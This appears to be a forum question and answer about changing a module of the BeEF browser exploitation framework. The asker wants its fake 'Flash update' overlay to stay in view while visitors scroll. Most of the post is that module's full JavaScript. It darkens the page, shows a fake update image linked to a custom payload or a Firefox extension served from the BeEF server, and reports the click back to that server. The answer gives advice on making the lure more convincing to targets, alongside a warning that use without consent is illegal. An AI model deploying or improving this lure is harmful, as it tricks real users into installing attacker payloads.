# how to add floating div to beEF projects scripts

Tags: javascript, jquery, css

in the beEF project there is a script that execute a fake flash update with a Gray background and an image for flash update. the problem is when the user scroll down. the background and the image still at the top of the page so i tried to edit the script and add some jquery code to make it move with the visitor when he/she scroll down but i couldn't do it.

```js
//
// Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

beef.execute(function() {
  
  // Module Configurations
  var image = "<%== @image %>";
  var payload_type = "<%== @payload %>";
  var payload_uri = "<%== @payload_uri %>";

  var beef_root = beef.net.httpproto + "://" + beef.net.host + ":" + beef.net.port;
  var payload = "";

  // Function to gray out the screen
  var grayOut = function(vis, options) {
    var options = options || {};
    var zindex = options.zindex || 50;
    var opacity = options.opacity || 70;
    var opaque = (opacity / 100);
    var bgcolor = options.bgcolor || '#000000';
    var dark=document.getElementById('darkenScreenObject');
    if (!dark) {
      var tbody = document.getElementsByTagName("body")[0];
      var tnode = document.createElement('div');
      tnode.style.position='absolute';
      tnode.style.top='0px';
      tnode.style.left='0px';
      tnode.style.overflow='hidden';
      tnode.style.display='none';
      tnode.id='darkenScreenObject';
      tbody.appendChild(tnode);
      dark=document.getElementById('darkenScreenObject');
    }
    if (vis) {
      var pageWidth='100%';
      var pageHeight='100%';
      dark.style.opacity=opaque;
      dark.style.MozOpacity=opaque;
      dark.style.filter='alpha(opacity='+opacity+')';
      dark.style.zIndex=zindex;
      dark.style.backgroundColor=bgcolor;
      dark.style.width= pageWidth;
      dark.style.height= pageHeight;
      dark.style.display='block';
    } else {
      dark.style.display='none';
    }
  };


  // Payload Configuration
  switch (payload_type) {
    case "Custom_Payload":
      payload = payload_uri;
    break;
    case "Firefox_Extension":
      payload = beef_root + "/api/ipec/ff_extension";
      break;
    default:
      beef.net.send('<%= @command_url %>', <%= @command_id %>, 'error=payload not selected');
      break;
  }

  // Create DIV
  var flashdiv = document.createElement('div');
  flashdiv.setAttribute('id', 'flashDiv');
  flashdiv.setAttribute('style', 'position:absolute; top:20%; left:30%; z-index:51;');
  flashdiv.setAttribute('align', 'center');
  document.body.appendChild(flashdiv);

  // window.open is very useful when using data URI vectors and the IFrame/Object tag
  // also, as the user is clicking on the link, the new tab opener is not blocked by the browser.
  flashdiv.innerHTML = "<a href=\"" + payload + "\" target=\"_blank\" ><img src=\"" + image + "\" /></a>";

  // gray out the background
  grayOut(true,{'opacity':'30'});

  // clean up on click
  $j("#flashDiv").click(function () {
    $j(this).hide();
    document.body.removeChild(flashdiv);
    grayOut(false,{'opacity':'0'});
    document.body.removeChild(document.getElementById('darkenScreenObject'));
    beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=user has clicked');
  });

});
```

Answer (score 0):

Kludge. Stick with the baseline BeEF. If you throw it in the user's face, they'll think its sketchy and won't click on it. You gotta think like the person (people) you are targeting with these attacks. If you were the user, would you click on something that downloads something if it follows you throughout the page? Of course not!

Bottom line, stick with regular BeEF. They've got it right.

Also, the only legal way you can use this is if you do it to yourself for testing purposes. Due to my background, I have to remind you that any use of BeEF outside of doing it to yourself or a consenting friend is ILLEGAL.
Don't test the police, and don't be stupid and do it over the internet. It will land you IN JAIL.

Cheers!

Comment: thank you for your answer, first of all this is just an example for beEF project scripts, i wasn't talking about a particular script. the main issue is, it takes about 10 seconds to get the connection between the user and the beef project after the user clicks the link, so he/she well be at the middle of the page or the end of it.

Comment: Doesn't work that way. Have you read about BeEF's features and how it works?